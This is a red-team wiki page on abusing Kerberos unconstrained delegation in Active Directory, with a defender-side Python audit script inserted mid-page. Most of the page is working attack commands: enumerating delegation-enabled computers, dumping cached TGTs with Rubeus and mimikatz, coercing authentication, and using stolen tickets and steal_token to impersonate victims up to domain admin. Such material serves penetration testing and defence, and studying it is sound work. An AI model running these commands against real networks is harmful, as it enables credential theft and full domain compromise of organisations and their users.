Unconstrained delegation - CraigDonkin/Infrastructure GitHub Wiki

Trust this computer for delegation to any service (Kerberos only)

  • Delegation allows a user or computer to impersonate another account, so they can access resources.
  • You can restrict what services the user or computer can impersonate. This is constrained delegation. If you don't use this option then it is unconstrained delegation.
  • If a user authenticates to a computer that has unconstrained delegation enabled, the authenticated user's TGT is saved in the computer's memory. When the computer tries to access something on behalf of that user, the user's TGT is used to request a TGS.
    • For example, a user authenticates to IIS which authenticates on behalf of them to a database server.
  • From a red team perspective, if you compromise a machine with unconstrained delegation, you can extract TGTs from the memory and then impersonate the victims against services.
    • If the victim is domain admin then you have domain admin.

Enumerate computers permitted for unconstrained delegation

PowerView

Get-NetComputer -Unconstrained

ADSearch

ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname

NetExec

nxc ldap <ip> -u <username> -p <password> --trusted-for-delegation
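As an added, defender-side example that is not part of this wiki: a short Python audit that applies the same userAccountControl bit (524288, TRUSTED_FOR_DELEGATION) that the ADSearch filter above matches on, run over constructed sample records shaped like exported LDAP attributes. It separates unconstrained hosts from constrained ones (msDS-AllowedToDelegateTo or protocol transition) and leaves out domain controllers, which carry the flag by default; host names and record values are constructed.

```python
# Added example: audit computer records for unconstrained delegation.
# Standard Active Directory userAccountControl bit flags.
SERVER_TRUST_ACCOUNT = 0x2000               # 8192: domain controller
TRUSTED_FOR_DELEGATION = 0x80000            # 524288: unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # 16777216: constrained w/ protocol transition

# Constructed sample records (not real hosts): a DC, a web server that the
# LDAP filter on the page would return, a constrained host and a plain host.
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "DC01$", "dNSHostName": "dc01.corp.example",
     "userAccountControl": 532480},          # 8192 | 524288
    {"sAMAccountName": "WEB01$", "dNSHostName": "web01.corp.example",
     "userAccountControl": 528384},          # 4096 | 524288
    {"sAMAccountName": "APP01$", "dNSHostName": "app01.corp.example",
     "userAccountControl": 4096,
     "msDS-AllowedToDelegateTo": ["MSSQLSvc/db01.corp.example:1433"]},
    {"sAMAccountName": "WS01$", "dNSHostName": "ws01.corp.example",
     "userAccountControl": 4096},
]


def delegation_type(record):
    """Classify one computer record as 'unconstrained', 'constrained' or 'none'."""
    uac = int(record.get("userAccountControl", 0))
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if record.get("msDS-AllowedToDelegateTo") or uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
        return "constrained"
    return "none"


def audit(records):
    """Return dNSHostName of every non-DC computer with unconstrained delegation.
    DCs have the flag by default, so only member hosts are reported for review."""
    findings = []
    for rec in records:
        is_dc = bool(int(rec.get("userAccountControl", 0)) & SERVER_TRUST_ACCOUNT)
        if delegation_type(rec) == "unconstrained" and not is_dc:
            findings.append(rec["dNSHostName"])
    return findings


if __name__ == "__main__":
    for rec in SAMPLE_COMPUTERS:
        print(f"{rec['sAMAccountName']:8} {delegation_type(rec)}")
    print("Needs review:", audit(SAMPLE_COMPUTERS))
```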

Enumerate cached TGT

  • Run Rubeus triage and look for the krbtgt service in the output.
  • Note the LUID.

Rubeus triage

  • Or use Rubeus monitor, which will periodically extract TGTs.
  • The monitor interval is in seconds. You can use /runfor:<seconds> to set how long it runs for.
  • If trying to target a specific user then use /targetuser:<user>.

Rubeus monitor /interval:<interval> /nowrap
Rubeus monitor /interval:<interval> /targetuser:<user>

Force authentication

  • Use a coercion method to force authentication from a target to the host that supports unconstrained delegation.
  • If capturing a machine account TGT you would need to use S4U2Self.

Extract TGT

  • Use Rubeus with the LUID.

Rubeus.exe dump /luid:<luid> /nowrap

  • Use Rubeus with monitor.

Rubeus monitor /interval:<interval> /nowrap
Rubeus monitor /interval:<interval> /targetuser:<user>

  • Use mimikatz.

mimikatz !sekurlsa::tickets /export

Leverage the TGT

  • Use Rubeus to leverage the TGT.

Rubeus.exe createnetonly /program:<program such as cmd.exe> /domain:<domain> /username:<user to impersonate> /password:<any fake password> /ticket:<TGT>

  • Then impersonate the process.

steal_token <PID>